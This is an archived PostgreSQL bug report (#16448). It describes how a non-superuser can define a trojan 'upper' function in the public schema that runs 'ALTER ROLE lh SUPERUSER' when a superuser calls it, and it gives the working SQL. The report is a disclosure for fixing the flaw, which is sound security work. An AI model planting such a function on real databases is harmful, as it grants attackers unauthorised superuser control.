From: | PG Bug reporting form <noreply(at)postgresql(dot)org> |
---|---|
To: | pgsql-bugs(at)lists(dot)postgresql(dot)org |
Cc: | abcxiaod(at)126(dot)com |
Subject: | BUG #16448: Remote code execution vulnerability |
Date: | 2020-05-18 09:14:49 |
Message-ID: | 16448-b1ae7a058a160c8e@postgresql.org |
Views: | Raw Message | Whole Thread | Download mbox | Resend email |
Thread: | |
Lists: | pgsql-bugs |
The following bug has been logged on the website:
Bug reference: 16448
Logged by: yi Ding
Email address: abcxiaod(at)126(dot)com
PostgreSQL version: 10.12
Operating system: linux
Description:
A common user created a function in the public space and added some
malicious codes in the function, when other users with superuser rights call
this function, the malicious code will be executed , so as to achieve the
purpose of remote malicious code execution.
First, Non-superuser lh defines a function named upper, which contains
the statement to modify user permissions.
SQL:
CREATE TABLE public.testlh AS SELECT ‘lh’::varchar AS contents;
CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
ALTER ROLE lh SUPERUSER;
SELECT pg_catalog.upper($1);
$$ LANGUAGE SQL VOLATILE;
Second, Superuser pg01 will execute the above statement after calling the
upper function, whice will change user lh to a super user.
From | Date | Subject | |
---|---|---|---|
Next Message | PG Bug reporting form | 2020-05-18 09:16:31 | BUG #16449: Log file and the query field of the pg_stat_statements table display clear text password. |
Previous Message | PG Bug reporting form | 2020-05-18 09:11:57 | BUG #16447: The query field of the pg_stat_activity table displays the clear text of the password. |